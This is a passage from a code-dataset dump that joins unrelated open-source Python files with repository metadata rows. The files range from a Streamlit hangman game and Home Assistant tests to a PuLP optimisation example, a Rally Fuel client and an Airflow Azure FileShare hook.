if _key_pem_old != dbAcmeAccount.acme_account_key.key_pem_md5:
_key_pem_old = cert_utils.cleanup_pem_text(_key_pem_old)
if _key_pem_old != dbAcmeAccount.acme_account_key.key_pem:
formStash.fatal_field(
field="key_pem_existing",
message="This does not match the active account key",
)
try:
results = lib_db.actions_acme.do__AcmeV2_AcmeAccount__key_change(
self.request.api_context,
dbAcmeAccount=dbAcmeAccount,
key_pem_new=None,
transaction_commit=True,
)
except errors.ConflictingObject as exc:
# args[0] = tuple(conflicting_object, error_message_string)
formStash.fatal_form(message=str(exc.args[0][1]))
if self.request.wants_json:
return {
"result": "success",
"AcmeAccount": dbAcmeAccount.as_json,
}
return HTTPSeeOther(
"%s?&result=success&operation=acme-server--key-change"
% (self._focus_url,)
)
except formhandling.FormInvalid as exc: # noqa: F841
if self.request.wants_json:
return {"result": "error", "form_errors": formStash.errors}
return formhandling.form_reprint(
self.request, self._focus__acme_server_key_change__print
)
| 40.498356 | 190 | 0.560408 |
acfa84dfbb827e74204cda16037ad15fe3f31cdc | 5,145 | py | Python | app.py | choudhary-vaibhav/CodingMan | 29d8a75b38d5575b650c37dd6d1d79efd6586a21 | [
"MIT"
] | null | null | null | app.py | choudhary-vaibhav/CodingMan | 29d8a75b38d5575b650c37dd6d1d79efd6586a21 | [
"MIT"
] | null | null | null | app.py | choudhary-vaibhav/CodingMan | 29d8a75b38d5575b650c37dd6d1d79efd6586a21 | [
"MIT"
] | null | null | null | import streamlit as st
st.set_page_config( page_title = "CodingMan")
#for page title
lose = 0 #for tracking wrong inputs
win = 0 #for tracking right inputs
def win_check(letter, text):
global lose
global win
if letter not in text:
lose += 1
else:
win += 1
if win == len(text):
st.balloons()
def update(letter, word, text):
""" This function is to update the word after every input, to be displayed"""
text = list(text)
word = list(word)
letter = letter.lower()
for i in range(len(text)):
if text[i] == letter:
word[2*i] = letter
new = ""
word = new.join(word)
u.markdown( f"<h1 style='text-align: center; color: red;'>{word}</h1>", unsafe_allow_html=True)
return word
st.markdown("<h1 style='text-align: center; color: royalblue;'>CodingMan</h1>", unsafe_allow_html=True)
st.markdown("<h3 style='text-align: center; '>Customized Hangman For Python Programmers</h3>", unsafe_allow_html=True)
u = st.empty() #for displaying the word
col = st.columns(5) #4 columns for input and 1 column for hangman in desktop version, this site is not responsive
with col[0]:
t1 = st.container()
with col[1]:
t2 = st.container()
with col[2]:
t3 = st.container()
with col[3]:
t4 = st.container()
with col[4]:
t5 = st.empty()
text = "tuple"
word = "_ _ _ _ _ "
limit = 0 #for attemted permissible inputs; which I took 4 more than the length of the word
count = 1 #for counting the input
letters = ['', '', '', '', '', '','','','','','','','','',''] #for storing inputs
u.markdown( f"<h1 style='text-align: center; color: red;'>{word}</h1>", unsafe_allow_html=True)
limit = len(text) + 4
t5.image('hangman_pics/pic1.jpeg')
letters[0] = t1.text_input(f"Enter a letter:", max_chars = 1, key = 1 )
if letters[0]:
count += 1
word = update(letters[0], word, text)
win_check(letters[0], text)
letters[1] = t2.text_input(f"Enter a letter:", max_chars = 1, key = 2 )
if letters[1]:
count += 1
word = update(letters[1], word, text)
win_check(letters[1], text)
letters[2] = t3.text_input(f"Enter a letter:", max_chars = 1, key = 3 )
if letters[2]:
count += 1
word = update(letters[2], word, text)
win_check(letters[2], text)
letters[3] = t4.text_input(f"Enter a letter:", max_chars = 1, key = 4 )
if letters[3] and (win != len(text)):
count += 1
word = update(letters[3], word, text)
win_check(letters[3], text)
letters[4] = t1.text_input(f"Enter a letter:", max_chars = 1, key = 5 )
if letters[4] and (lose != 4) and (win != len(text)):
count += 1
word = update(letters[4], word, text)
win_check(letters[4], text)
letters[5] = t2.text_input(f"Enter a letter:", max_chars = 1, key = 6 )
if letters[5] and lose != 4 and (win != len(text)):
count += 1
word = update(letters[5], word, text)
win_check(letters[5], text)
letters[6] = t3.text_input(f"Enter a letter:", max_chars = 1, key = 7 )
if letters[6] and count != limit and lose != 4 and (win != len(text)):
count += 1
word = update(letters[6], word, text)
win_check(letters[6], text)
letters[7] = t4.text_input(f"Enter a letter:", max_chars = 1, key = 8 )
if letters[7] and count != limit and lose != 4 and (win != len(text)):
count += 1
word = update(letters[7], word, text)
win_check(letters[7], text)
letters[8] = t2.text_input(f"Enter a letter:", max_chars = 1, key = 9 )
if letters[8] and count != limit and lose != 4 and (win != len(text)):
count += 1
word = update(letters[8], word, text)
win_check(letters[8], text)
letters[9] = t3.text_input(f"Enter a letter:", max_chars = 1, key = 10 )
if letters[9] and count != limit and lose != 4 and (win != len(text)):
word = update(letters[9], word, text)
win_check(letters[9], text)
if lose == 1:
t5.image('hangman_pics/pic2.jpeg')
elif lose == 2:
t5.image('hangman_pics/pic3.jpeg')
elif lose == 3:
t5.image('hangman_pics/pic4.jpeg')
elif lose == 4:
t5.image('hangman_pics/pic5.jpeg')
| 30.625 | 118 | 0.491934 |
acfa853d596f27307a7f5506c43aedf1c8e7bb64 | 8,146 | py | Python | tests/components/device_automation/test_init.py | kit-klein/home-assistant | 9c49b8dfc1b9723abe77fb7bb975f94b5233ad00 | [
"Apache-2.0"
] | null | null | null | tests/components/device_automation/test_init.py | kit-klein/home-assistant | 9c49b8dfc1b9723abe77fb7bb975f94b5233ad00 | [
"Apache-2.0"
] | 3 | 2018-01-23T20:41:55.000Z | 2018-01-23T20:42:12.000Z | tests/components/device_automation/test_init.py | kit-klein/home-assistant | 9c49b8dfc1b9723abe77fb7bb975f94b5233ad00 | [
"Apache-2.0"
] | null | null | null | """The test for light device automation."""
import pytest
from homeassistant.setup import async_setup_component
import homeassistant.components.automation as automation
from homeassistant.components.websocket_api.const import TYPE_RESULT
from homeassistant.helpers import device_registry
from tests.common import MockConfigEntry, mock_device_registry, mock_registry
@pytest.fixture
def device_reg(hass):
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture
def entity_reg(hass):
"""Return an empty, loaded, registry."""
return mock_registry(hass)
def _same_lists(a, b):
if len(a) != len(b):
return False
for d in a:
if d not in b:
return False
return True
async def test_websocket_get_actions(hass, hass_ws_client, device_reg, entity_reg):
"""Test we get the expected conditions from a light through websocket."""
await async_setup_component(hass, "device_automation", {})
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create("light", "test", "5678", device_id=device_entry.id)
expected_actions = [
{
"domain": "light",
"type": "turn_off",
"device_id": device_entry.id,
"entity_id": "light.test_5678",
},
{
"domain": "light",
"type": "turn_on",
"device_id": device_entry.id,
"entity_id": "light.test_5678",
},
{
"domain": "light",
"type": "toggle",
"device_id": device_entry.id,
"entity_id": "light.test_5678",
},
]
client = await hass_ws_client(hass)
await client.send_json(
{"id": 1, "type": "device_automation/action/list", "device_id": device_entry.id}
)
msg = await client.receive_json()
assert msg["id"] == 1
assert msg["type"] == TYPE_RESULT
assert msg["success"]
actions = msg["result"]
assert _same_lists(actions, expected_actions)
async def test_websocket_get_conditions(hass, hass_ws_client, device_reg, entity_reg):
"""Test we get the expected conditions from a light through websocket."""
await async_setup_component(hass, "device_automation", {})
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create("light", "test", "5678", device_id=device_entry.id)
expected_conditions = [
{
"condition": "device",
"domain": "light",
"type": "is_off",
"device_id": device_entry.id,
"entity_id": "light.test_5678",
},
{
"condition": "device",
"domain": "light",
"type": "is_on",
"device_id": device_entry.id,
"entity_id": "light.test_5678",
},
]
client = await hass_ws_client(hass)
await client.send_json(
{
"id": 1,
"type": "device_automation/condition/list",
"device_id": device_entry.id,
}
)
msg = await client.receive_json()
assert msg["id"] == 1
assert msg["type"] == TYPE_RESULT
assert msg["success"]
conditions = msg["result"]
assert _same_lists(conditions, expected_conditions)
async def test_websocket_get_triggers(hass, hass_ws_client, device_reg, entity_reg):
"""Test we get the expected triggers from a light through websocket."""
await async_setup_component(hass, "device_automation", {})
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create("light", "test", "5678", device_id=device_entry.id)
expected_triggers = [
{
"platform": "device",
"domain": "light",
"type": "turned_off",
"device_id": device_entry.id,
"entity_id": "light.test_5678",
},
{
"platform": "device",
"domain": "light",
"type": "turned_on",
"device_id": device_entry.id,
"entity_id": "light.test_5678",
},
]
client = await hass_ws_client(hass)
await client.send_json(
{
"id": 1,
"type": "device_automation/trigger/list",
"device_id": device_entry.id,
}
)
msg = await client.receive_json()
assert msg["id"] == 1
assert msg["type"] == TYPE_RESULT
assert msg["success"]
triggers = msg["result"]
assert _same_lists(triggers, expected_triggers)
async def test_automation_with_non_existing_integration(hass, caplog):
"""Test device automation with non existing integration."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"alias": "hello",
"trigger": {
"platform": "device",
"device_id": "none",
"domain": "beer",
},
"action": {"service": "test.automation", "entity_id": "hello.world"},
}
},
)
assert "Integration 'beer' not found" in caplog.text
async def test_automation_with_integration_without_device_action(hass, caplog):
"""Test automation with integration without device action support."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"alias": "hello",
"trigger": {"platform": "event", "event_type": "test_event1"},
"action": {"device_id": "", "domain": "test"},
}
},
)
assert (
"Integration 'test' does not support device automation actions" in caplog.text
)
async def test_automation_with_integration_without_device_trigger(hass, caplog):
"""Test automation with integration without device trigger support."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"alias": "hello",
"trigger": {
"platform": "device",
"device_id": "none",
"domain": "test",
},
"action": {"service": "test.automation", "entity_id": "hello.world"},
}
},
)
assert (
"Integration 'test' does not support device automation triggers" in caplog.text
)
async def test_automation_with_bad_action(hass, caplog):
"""Test automation with bad device action."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"alias": "hello",
"trigger": {"platform": "event", "event_type": "test_event1"},
"action": {"device_id": "", "domain": "light"},
}
},
)
assert "required key not provided" in caplog.text
async def test_automation_with_bad_trigger(hass, caplog):
"""Test automation with bad device trigger."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"alias": "hello",
"trigger": {"platform": "device", "domain": "light"},
"action": {"service": "test.automation", "entity_id": "hello.world"},
}
},
)
assert "required key not provided" in caplog.text
| 31.091603 | 88 | 0.588264 |
acfa861d33f948d1a0a20b06831d2194be46c2ad | 1,131 | py | Python | python/__init__.py | qgua2322/rfnoc-Kwan | be84faffc77246d47062bd9197674e81039ecfdb | [
"MIT"
] | null | null | null | python/__init__.py | qgua2322/rfnoc-Kwan | be84faffc77246d47062bd9197674e81039ecfdb | [
"MIT"
] | null | null | null | python/__init__.py | qgua2322/rfnoc-Kwan | be84faffc77246d47062bd9197674e81039ecfdb | [
"MIT"
] | null | null | null | #
# Copyright 2008,2009 Free Software Foundation, Inc.
#
# This application is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# The presence of this file turns this directory into a Python package
'''
This is the GNU Radio KWAN module. Place your Python package
description here (python/__init__.py).
'''
# import swig generated symbols into the Kwan namespace
try:
# this might fail if the module is python-only
from Kwan_swig import *
except ImportError:
pass
# import any pure python here
#
| 32.314286 | 74 | 0.765694 |
acfa866624932b4ba11e15b2079f362857adf65d | 390 | py | Python | remote_tutor/tuition/migrations/0005_auto_20191101_0950.py | wasim2263/remote-tutor | 803dbd5b500bf5b82e4888f40463cbd2db1125ac | [
"MIT"
] | null | null | null | remote_tutor/tuition/migrations/0005_auto_20191101_0950.py | wasim2263/remote-tutor | 803dbd5b500bf5b82e4888f40463cbd2db1125ac | [
"MIT"
] | null | null | null | remote_tutor/tuition/migrations/0005_auto_20191101_0950.py | wasim2263/remote-tutor | 803dbd5b500bf5b82e4888f40463cbd2db1125ac | [
"MIT"
] | null | null | null | # Generated by Django 2.2.2 on 2019-11-01 09:50
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('tutor', '0009_auto_20191030_1706'),
('tuition', '0004_auto_20190919_0646'),
]
operations = [
migrations.RenameModel(
old_name='RequestTutor',
new_name='RequestTuition',
),
]
| 20.526316 | 47 | 0.610256 |
acfa86c39bdc0206c23aa05355ccc89435a8c927 | 2,895 | py | Python | lib/modeling/meta_embedding_classifier.py | YerongLi2/LTVRR | 26a6a03dd44cb6b008e0974ad9915a149d666786 | [
"MIT"
] | 13 | 2021-04-24T12:32:48.000Z | 2022-03-14T15:47:31.000Z | lib/modeling/meta_embedding_classifier.py | YerongLi2/LTVRR | 26a6a03dd44cb6b008e0974ad9915a149d666786 | [
"MIT"
] | 5 | 2021-02-26T04:44:52.000Z | 2022-03-31T07:16:53.000Z | lib/modeling/meta_embedding_classifier.py | Vision-CAIR/relTransformer_github | ec3be058da9c4f2f68d7c4dfb759209748732b93 | [
"MIT"
] | 1 | 2022-03-30T08:06:08.000Z | 2022-03-30T08:06:08.000Z | import torch
import torch.nn as nn
from modeling.cos_norm_classifier import CosNorm_Classifier
from utils.memory_utils import *
import pdb
class MetaEmbedding_Classifier(nn.Module):
def __init__(self, feat_dim=2048, num_classes=1000):
super(MetaEmbedding_Classifier, self).__init__()
self.num_classes = num_classes
self.fc_hallucinator = nn.Linear(feat_dim, num_classes)
self.fc_selector = nn.Linear(feat_dim, feat_dim)
self.cosnorm_classifier = CosNorm_Classifier(feat_dim, num_classes)
def forward(self, x, centroids, *args):
# storing direct feature
direct_feature = x
batch_size = x.size(0)
feat_size = x.size(1)
# set up visual memory
#x_expand = x.unsqueeze(1).expand(-1, self.num_classes, -1)
#centroids_expand = centroids.unsqueeze(0).expand(batch_size, -1, -1)
keys_memory = centroids
#print(x_expand.shape)
#print(centroids_expand.shape)
# computing reachability
#dist_cur = torch.norm(x_expand - centroids_expand, 2, 2)
#values_nn, labels_nn = torch.sort(dist_cur, 1)
#scale = 10.0
#reachability = (scale / values_nn[:, 0]).unsqueeze(1).expand(-1, feat_size)
# computing memory feature by querying and associating visual memory
values_memory = self.fc_hallucinator(x)
values_memory = values_memory.softmax(dim=1)
memory_feature = torch.matmul(values_memory, keys_memory)
# computing concept selector
concept_selector = self.fc_selector(x)
concept_selector = concept_selector.tanh()
#x = reachability * (direct_feature + concept_selector * memory_feature)
x = (direct_feature + concept_selector * memory_feature)
# storing infused feature
infused_feature = concept_selector * memory_feature
logits = self.cosnorm_classifier(x)
return logits, [direct_feature, infused_feature]
def create_model(feat_dim=2048, num_classes=1000, stage1_weights=False, dataset=None, test=False, prd=False, *args):
print('Loading Meta Embedding Classifier.')
clf = MetaEmbedding_Classifier(feat_dim, num_classes)
weights = 'Outputs/e2e_relcnn_VGG16_8_epochs_gvqa_y_loss_only_1_gpu/gvqa/Feb07-10-55-03_login104-09_step_with_prd_cls_v3/ckpt/model_step1439.pth'
if not test:
if stage1_weights:
assert(dataset)
print('Loading %s Stage 1 Classifier Weights.' % dataset)
clf.fc_hallucinator = init_weights(model=clf.fc_hallucinator,
weights_path=weights,
classifier=True,
prd=prd)
else:
print('Random initialized classifier weights.')
return clf
| 40.774648 | 149 | 0.648014 |
acfa87248e54ad790e12fa11b552b68dcebc9730 | 1,863 | py | Python | examples/SpongeRollProblem1.py | betterhours/pulp | 0618ec018bb33b1b77e5ff868162f7ffde9f1566 | [
"MIT"
] | 4 | 2019-08-13T20:26:15.000Z | 2021-07-05T15:52:45.000Z | examples/SpongeRollProblem1.py | betterhours/pulp | 0618ec018bb33b1b77e5ff868162f7ffde9f1566 | [
"MIT"
] | null | null | null | examples/SpongeRollProblem1.py | betterhours/pulp | 0618ec018bb33b1b77e5ff868162f7ffde9f1566 | [
"MIT"
] | 1 | 2019-12-03T17:11:35.000Z | 2019-12-03T17:11:35.000Z | """
The Simplified Sponge Roll Problem for the PuLP Modeller
Authors: Antony Phillips, Dr Stuart Mitchell 2007
"""
# Import PuLP modeler functions
from pulp import *
# A list of all the roll lengths is created
LenOpts = ["5","7","9"]
# A dictionary of the demand for each roll length is created
rollDemand = {"5":150,
"7":200,
"9":300}
# A list of all the patterns is created
PatternNames = ["A","B","C"]
# Creates a list of the number of rolls in each pattern for each different roll length
patterns = [#A B C
[0,2,2],# 5
[1,1,0],# 7
[1,0,1] # 9
]
# The cost of each 20cm long sponge roll used
cost = 1
# The pattern data is made into a dictionary
patterns = makeDict([LenOpts,PatternNames],patterns,0)
# The problem variables of the number of each pattern to make are created
vars = LpVariable.dicts("Patt",PatternNames,0,None,LpInteger)
# The variable 'prob' is created
prob = LpProblem("Cutting Stock Problem",LpMinimize)
# The objective function is entered: the total number of large rolls used * the fixed cost of each
prob += lpSum([vars[i]*cost for i in PatternNames]),"Production Cost"
# The demand minimum constraint is entered
for i in LenOpts:
prob += lpSum([vars[j]*patterns[i][j] for j in PatternNames])>=rollDemand[i],"Ensuring enough %s cm rolls"%i
# The problem data is written to an .lp file
prob.writeLP("SpongeRollProblem.lp")
# The problem is solved using PuLP's choice of Solver
prob.solve()
# The status of the solution is printed to the screen
print("Status:", LpStatus[prob.status])
# Each of the variables is printed with it's resolved optimum value
for v in prob.variables():
print(v.name, "=", v.varValue)
# The optimised objective function value is printed to the screen
print("Production Costs = ", value(prob.objective))
| 30.048387 | 112 | 0.693505 |
acfa874cefa76e760e3a55e3edff89a795cb5be9 | 166 | py | Python | sideboard/run_server.py | bitbyt3r/sideboard | 45e13011a664543352d51ce073cfa9635c748bb7 | [
"BSD-3-Clause"
] | 4 | 2015-02-18T20:38:42.000Z | 2021-11-17T10:10:34.000Z | sideboard/run_server.py | bitbyt3r/sideboard | 45e13011a664543352d51ce073cfa9635c748bb7 | [
"BSD-3-Clause"
] | 84 | 2015-07-23T12:23:24.000Z | 2018-08-04T05:09:30.000Z | sideboard/run_server.py | bitbyt3r/sideboard | 45e13011a664543352d51ce073cfa9635c748bb7 | [
"BSD-3-Clause"
] | 10 | 2015-02-10T13:38:18.000Z | 2020-05-23T20:01:36.000Z | from __future__ import unicode_literals
import cherrypy
import sideboard.server
if __name__ == '__main__':
cherrypy.engine.start()
cherrypy.engine.block()
| 16.6 | 39 | 0.76506 |
acfa8799c32a9c15c54665615f3cf9ae86167657 | 8,456 | py | Python | rally/deployment/fuel/fuelclient.py | aforalee/rallyALi | 8050ca08b0e253aeb19a1cec34f33c648f00136a | [
"Apache-2.0"
] | 2 | 2015-02-06T11:03:12.000Z | 2015-03-02T10:39:44.000Z | rally/deployment/fuel/fuelclient.py | aforalee/rallyALi | 8050ca08b0e253aeb19a1cec34f33c648f00136a | [
"Apache-2.0"
] | null | null | null | rally/deployment/fuel/fuelclient.py | aforalee/rallyALi | 8050ca08b0e253aeb19a1cec34f33c648f00136a | [
"Apache-2.0"
] | 2 | 2016-03-16T03:52:13.000Z | 2020-10-02T07:58:50.000Z | # Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import re
import time
import requests
from rally.common import log as logging
LOG = logging.getLogger(__name__)
FILTER_REG = re.compile(r"^([a-z]+)\s*([<>=!]=|<|>)\s*(.+)$")
INT_REG = re.compile(r"^(\d+)(K|M|G|T)?$")
class FuelException(Exception):
pass
class FuelClientException(FuelException):
def __init__(self, code, body):
self.code = code
self.body = body
def __str__(self):
return ("FuelClientException. "
"Code: %(code)d Body: %(body)s" % {"code": self.code,
"body": self.body})
class FuelNetworkVerificationFailed(FuelException):
pass
class FuelNode(object):
def __init__(self, node):
self.node = node
self.ATTRIBUTE_MAP = {
"==": lambda x, y: x == y,
"!=": lambda x, y: x != y,
"<=": lambda x, y: x <= y,
">=": lambda x, y: x >= y,
"<": lambda x, y: x < y,
">": lambda x, y: x > y,
}
self.FACTOR_MAP = {
"K": 1024,
"M": 1048576,
"G": 1073741824,
"T": 1099511627776,
None: 1,
}
def __getitem__(self, key):
return self.node[key]
def check_filters(self, filters):
return all((self.check(f) for f in filters))
def check(self, filter_string):
if self.node["cluster"] is not None:
return False
m = FILTER_REG.match(filter_string)
if m is None:
raise ValueError("Invalid filter: %s" % filter_string)
attribute, operator, value = m.groups()
return self._check(attribute, value, operator)
def _check(self, attribute, value, operator):
attribute = getattr(self, "_get_" + attribute)()
checker = self.ATTRIBUTE_MAP[operator]
m = INT_REG.match(value)
if m:
value = int(m.group(1)) * self.FACTOR_MAP[m.group(2)]
return checker(attribute, value)
def _get_ram(self):
return self.node["meta"]["memory"]["total"]
def _get_mac(self):
return self.node["mac"]
def _get_storage(self):
return sum((d["size"] for d in self.node["meta"]["disks"]))
def _get_cpus(self):
return self.node["meta"]["cpu"]["total"]
class FuelCluster(object):
def __init__(self, client, **config):
"""Create Fuel cluster.
:param client: FuelClient instance.
:param name: Name
:param release: Release id. Integer.
:param mode: One of multinode, ha_compact
:param net_provider: One of nova_network, neutron
:param net_segment_type: One of gre, vlan.
:param dns_nameservers: List of strings.
"""
self.client = client
self.cluster = client.post("clusters", config)
def get_nodes(self):
return self.client.get("nodes?cluster_id=%d" % self.cluster["id"])
def set_nodes(self, nodes, roles):
if not nodes:
return
node_list = []
for n in nodes:
node_list.append({"id": n["id"],
"pending_roles": roles,
"pending_addition": True,
"cluster_id": self.cluster["id"]})
self.client.put("nodes", node_list)
def configure_network(self, config):
netconfig = self.get_network()
for network in netconfig["networks"]:
if network["name"] in config:
network.update(config[network["name"]])
self.set_network(netconfig)
def deploy(self):
self.client.put("clusters/%d/changes" % self.cluster["id"], {})
for task in self.client.get_tasks(self.cluster["id"]):
if task["name"] == "deploy":
task_id = task["id"]
break
while 1:
time.sleep(10)
task = self.client.get_task(task_id)
if task["progress"] == 100:
return
LOG.info("Deployment in progress. %d%% done." % task["progress"])
def get_network(self):
args = {"cluster_id": self.cluster["id"],
"net_provider": self.cluster["net_provider"]}
url = ("clusters/%(cluster_id)d/network_configuration/"
"%(net_provider)s" % args)
return self.client.get(url)
def set_network(self, config):
self.verify_network(config)
args = {"cluster_id": self.cluster["id"],
"net_provider": self.cluster["net_provider"]}
url = ("clusters/%(cluster_id)d/network_configuration/"
"%(net_provider)s" % args)
self.client.put(url, config)
def verify_network(self, config):
args = {"cluster_id": self.cluster["id"],
"net_provider": self.cluster["net_provider"]}
url = ("clusters/%(cluster_id)d/network_configuration/"
"%(net_provider)s/verify" % args)
task_id = self.client.put(url, config)["id"]
while 1:
time.sleep(5)
task = self.client.get_task(task_id)
if task["progress"] == 100:
if task["message"]:
raise FuelNetworkVerificationFailed(task["message"])
else:
return
LOG.info("Network verification in progress."
" %d%% done." % task["progress"])
def get_attributes(self):
return self.client.get("clusters/%d/attributes" % self.cluster["id"])
def get_endpoint_ip(self):
if self.cluster["mode"].startswith("ha_"):
netdata = self.get_network()
return netdata["public_vip"]
for node in self.get_nodes():
if "controller" in node["roles"]:
for net in node["network_data"]:
if net["name"] == "public":
return net["ip"].split("/")[0]
raise FuelException("Unable to get endpoint ip.")
class FuelNodesCollection(object):
nodes = []
def __init__(self, nodes):
for node in nodes:
self.nodes.append(FuelNode(node))
def pop(self, filters):
for i, node in enumerate(self.nodes):
if node.check_filters(filters):
return self.nodes.pop(i)
class FuelClient(object):
def __init__(self, base_url):
self.base_url = base_url
def _request(self, method, url, data=None):
if data:
data = json.dumps(data)
headers = {"content-type": "application/json"}
reply = getattr(requests, method)(self.base_url + url, data=data,
headers=headers)
if reply.status_code >= 300 or reply.status_code < 200:
raise FuelClientException(code=reply.status_code, body=reply.text)
if reply.text and reply.headers["content-type"] == "application/json":
return json.loads(reply.text)
return reply
def get(self, url):
return self._request("get", url)
def post(self, url, data):
return self._request("post", url, data)
def put(self, url, data):
return self._request("put", url, data)
def delete(self, url):
return self._request("delete", url)
def get_releases(self):
return self.get("releases")
def get_task(self, task_id):
return self.get("tasks/%d" % task_id)
def get_tasks(self, cluster_id):
return self.get("tasks?cluster_id=%d" % cluster_id)
def get_node(self, node_id):
return self.get("nodes/%d" % node_id)
def get_nodes(self):
return FuelNodesCollection(self.get("nodes"))
def delete_cluster(self, cluster_id):
self.delete("clusters/%s" % cluster_id)
| 31.909434 | 78 | 0.56386 |
acfa881ddb266b92d56a21c6eff46dce2f4ba1e1 | 13,221 | py | Python | airflow/providers/microsoft/azure/hooks/azure_fileshare.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 15,947 | 2019-01-05T13:51:02.000Z | 2022-03-31T23:33:16.000Z | airflow/providers/microsoft/azure/hooks/azure_fileshare.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 14,603 | 2019-01-05T09:43:19.000Z | 2022-03-31T23:11:59.000Z | airflow/providers/microsoft/azure/hooks/azure_fileshare.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 8,429 | 2019-01-05T19:45:47.000Z | 2022-03-31T22:13:01.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import warnings
from typing import Any, Dict, List, Optional
from azure.storage.file import File, FileService
from airflow.hooks.base import BaseHook
class AzureFileShareHook(BaseHook):
"""
Interacts with Azure FileShare Storage.
:param azure_fileshare_conn_id: Reference to the
:ref:`Azure Container Volume connection id<howto/connection:azure_fileshare>`
of an Azure account of which container volumes should be used.
"""
conn_name_attr = "azure_fileshare_conn_id"
default_conn_name = 'azure_fileshare_default'
conn_type = 'azure_fileshare'
hook_name = 'Azure FileShare'
def __init__(self, azure_fileshare_conn_id: str = 'azure_fileshare_default') -> None:
super().__init__()
self.conn_id = azure_fileshare_conn_id
self._conn = None
@staticmethod
def get_connection_form_widgets() -> Dict[str, Any]:
"""Returns connection widgets to add to connection form"""
from flask_appbuilder.fieldwidgets import BS3PasswordFieldWidget, BS3TextFieldWidget
from flask_babel import lazy_gettext
from wtforms import PasswordField, StringField
return {
"extra__azure_fileshare__sas_token": PasswordField(
lazy_gettext('SAS Token (optional)'), widget=BS3PasswordFieldWidget()
),
"extra__azure_fileshare__connection_string": StringField(
lazy_gettext('Connection String (optional)'), widget=BS3TextFieldWidget()
),
"extra__azure_fileshare__protocol": StringField(
lazy_gettext('Account URL or token (optional)'), widget=BS3TextFieldWidget()
),
}
@staticmethod
def get_ui_field_behaviour() -> Dict:
"""Returns custom field behaviour"""
return {
"hidden_fields": ['schema', 'port', 'host', 'extra'],
"relabeling": {
'login': 'Blob Storage Login (optional)',
'password': 'Blob Storage Key (optional)',
'host': 'Account Name (Active Directory Auth)',
},
"placeholders": {
'login': 'account name',
'password': 'secret',
'host': 'account url',
'extra__azure_fileshare__sas_token': 'account url or token (optional)',
'extra__azure_fileshare__connection_string': 'account url or token (optional)',
'extra__azure_fileshare__protocol': 'account url or token (optional)',
},
}
def get_conn(self) -> FileService:
"""Return the FileService object."""
prefix = "extra__azure_fileshare__"
if self._conn:
return self._conn
conn = self.get_connection(self.conn_id)
service_options_with_prefix = conn.extra_dejson
service_options = {}
for key, value in service_options_with_prefix.items():
# in case dedicated FileShareHook is used, the connection will use the extras from UI.
# in case deprecated wasb hook is used, the old extras will work as well
if key.startswith(prefix):
if value != '':
service_options[key[len(prefix) :]] = value
else:
# warn if the deprecated wasb_connection is used
warnings.warn(
"You are using deprecated connection for AzureFileShareHook."
" Please change it to `Azure FileShare`.",
DeprecationWarning,
)
else:
service_options[key] = value
# warn if the old non-prefixed value is used
warnings.warn(
"You are using deprecated connection for AzureFileShareHook."
" Please change it to `Azure FileShare`.",
DeprecationWarning,
)
self._conn = FileService(account_name=conn.login, account_key=conn.password, **service_options)
return self._conn
def check_for_directory(self, share_name: str, directory_name: str, **kwargs) -> bool:
"""
Check if a directory exists on Azure File Share.
:param share_name: Name of the share.
:type share_name: str
:param directory_name: Name of the directory.
:type directory_name: str
:param kwargs: Optional keyword arguments that
`FileService.exists()` takes.
:type kwargs: object
:return: True if the file exists, False otherwise.
:rtype: bool
"""
return self.get_conn().exists(share_name, directory_name, **kwargs)
def check_for_file(self, share_name: str, directory_name: str, file_name: str, **kwargs) -> bool:
"""
